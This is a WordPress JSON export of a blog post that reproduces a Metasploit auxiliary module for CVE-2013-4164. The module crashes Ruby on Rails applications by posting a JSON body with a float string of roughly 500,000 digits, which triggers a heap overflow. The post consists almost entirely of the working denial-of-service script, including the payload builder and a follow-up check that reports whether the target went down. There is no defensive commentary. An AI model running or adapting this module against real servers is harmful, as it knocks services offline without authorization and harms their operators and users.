{"id":59276,"date":"2024-08-31T21:19:53","date_gmt":"2024-08-31T18:19:53","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180519\/rails_json_float_dos.rb.txt"},"modified":"2024-08-31T21:19:53","modified_gmt":"2024-08-31T18:19:53","slug":"ruby-on-rails-json-processor-floating-point-heap-overflow-denial-of-service","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/ruby-on-rails-json-processor-floating-point-heap-overflow-denial-of-service\/","title":{"rendered":"Ruby on Rails JSON Processor Floating Point Heap Overflow Denial of Service"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos<\/p>\n

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Ruby on Rails JSON Processor Floating Point Heap Overflow DoS’,
‘Description’ => %q{
When Ruby attempts to convert a string representation of a large floating point
decimal number to its floating point equivalent, a heap-based buffer overflow
can be triggered. This module has been tested successfully on a Ruby on Rails application
using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application
crashes with a segfault error. Other versions of Ruby are reported to be affected.
},
‘Author’ =>
[
‘Charlie Somerville’, # original discoverer
‘joev’, # bash PoC
‘todb’, # Metasploit module
],
‘License’ => MSF_LICENSE,
‘References’ =>
[
[ ‘CVE’, ‘2013-4164’ ],
[ ‘OSVDB’, ‘100113’ ],
[ ‘URL’, ‘https:\/\/www.ruby-lang.org\/en\/news\/2013\/11\/22\/ruby-1-9-3-p484-is-released\/’ ]],
‘DisclosureDate’ => ‘2013-11-22’))
register_options(
[
OptString.new(‘TARGETURI’, [false, ‘The URL of the vulnerable Rails application’, ‘\/’]),
OptString.new(‘HTTPVERB’, [false, ‘The HTTP verb to use’, ‘POST’])
])
end<\/p>\n

def uri
normalize_uri(target_uri.path.to_s)
end<\/p>\n

def verb
datastore[‘HTTPVERB’] || ‘POST’
end<\/p>\n

def digit_pattern
@digit_pattern ||= rand(10_000).to_s
end<\/p>\n

def integer_part
digit_pattern
end<\/p>\n

def multiplier
(500_000 * (1.0\/digit_pattern.size)).to_i
end<\/p>\n

def fractional_part
digit_pattern * multiplier
end<\/p>\n

# The evil_float seems to require some repeating element. Maybe
# it’s just superstition, but straight up 300_002-lenth random
# numbers don’t appear to trigger the vulnerability. Also, these are
# easier to produce, and slightly better than the static “1.1111…”
# for 300,000 decimal places.
def evil_float_string
[integer_part,fractional_part].join(‘.’)
end<\/p>\n

def run
print_status “Using digit pattern of #{digit_pattern} taken to #{multiplier} places”
sploit = ‘[‘
sploit << evil_float_string
sploit << ‘]’
print_status “Sending DoS HTTP#{datastore[‘SSL’] ? ‘S’ : ”} #{verb} request to #{uri}”
target_available = true<\/p>\n

begin
res = send_request_cgi(
{
‘method’ => verb,
‘uri’ => uri,
‘ctype’ => “application\/json”,
‘data’ => sploit
})
rescue ::Rex::ConnectionRefused
print_error “Unable to connect. (Connection refused)”
target_available = false
rescue ::Rex::HostUnreachable
print_error “Unable to connect. (Host unreachable)”
target_available = false
rescue ::Rex::ConnectionTimeout
print_error “Unable to connect. (Timeout)”
target_available = false
end<\/p>\n

return unless target_available<\/p>\n

print_status “Checking availability”
begin
res = send_request_cgi({
‘method’ => verb,
‘uri’ => uri,
‘ctype’ => “application\/json”,
‘data’ => Rex::Text.rand_text_alpha(1+rand(64)).to_json
})
if res and res.body and res.body.size > 0
target_available = true
else
print_good “#{peer}#{uri} – DoS appears successful (No useful response from host)”
target_available = false
end
rescue ::Rex::ConnectionError, Errno::ECONNRESET
print_good “DoS appears successful (Host unreachable)”
target_available = false
end<\/p>\n

return unless target_available<\/p>\n

print_error “Target is still responsive, DoS was unsuccessful.”<\/p>\n

end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Dos def initialize(info = {})super(update_info(info,‘Name’ => ‘Ruby on Rails JSON Processor Floating Point Heap Overflow DoS’,‘Description’ => %q{When Ruby attempts to convert a string representation of a large floating pointdecimal number to its floating point equivalent, a heap-based buffer overflowcan be …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59276","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59276","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59276"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59276\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59276"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59276"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59276"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}